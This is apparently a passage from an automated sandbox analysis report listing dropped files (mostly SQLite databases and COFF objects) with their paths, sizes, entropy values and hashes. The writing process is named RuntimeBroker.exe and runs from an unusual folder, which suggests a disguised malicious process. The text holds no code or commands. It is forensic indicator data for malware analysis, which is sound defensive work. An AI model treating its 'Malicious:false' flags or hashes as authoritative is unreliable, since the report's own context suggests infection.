                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Sat Jan 11 07:16:07 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1932
                                                                                  Entropy (8bit):4.613005317386376
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HjfW9JLzcXQBtbaHIQwKDMHNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+5gcN:TaLzZCIKDMHslmuulB+hnqXSfbNtmh5N
                                                                                  MD5:403E0ABBA551517D0F4CB6BC10DE9038
                                                                                  SHA1:ED4A756D4635509576AC8B47A381B5C82C1457FB
                                                                                  SHA-256:7EF3F899ED94C40CE3977E02F459BDEEC276670D9552A1F1A9C4EB4FB6609CC8
                                                                                  SHA-512:11E72D261B6FD1189D5B36D8C27AA4B0855842E9AF2C5CD81C0AFD6E116E89E8DC29B7C5053C0B2DF4AAD137D5DEED5B080748368DC71A2FB9A59DEB3C0B5857
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESBF2D.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\ServerWinRuntimeBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 11 07:16:07 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1956
                                                                                  Entropy (8bit):4.560599855665032
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:H7O9GXOXjtbaHgwKDMHNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:0XQvKDMHEluOulajfqXSfbNtmh1Z
                                                                                  MD5:93F51BB1B47E66279DD4D910D78CD19A
                                                                                  SHA1:697D047F6C0F6A3FBCDAEF718CDFE81ADD0347F6
                                                                                  SHA-256:CF218BD2BFD1CD18B68C3B74C9244ED7734067DF02A8AB5B67380D991B76FBF3
                                                                                  SHA-512:05FCCF670047117CE13D4A51A7A232593B84CF0662BF28521A805AC28B105D36FB9568C44F4AD314AE46104075B9DDD8F5974FDA2AA995FE3975A420B90EFE49
                                                                                  Malicious:false
                                                                                  Preview:L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESC121.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\ServerWinRuntimeBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
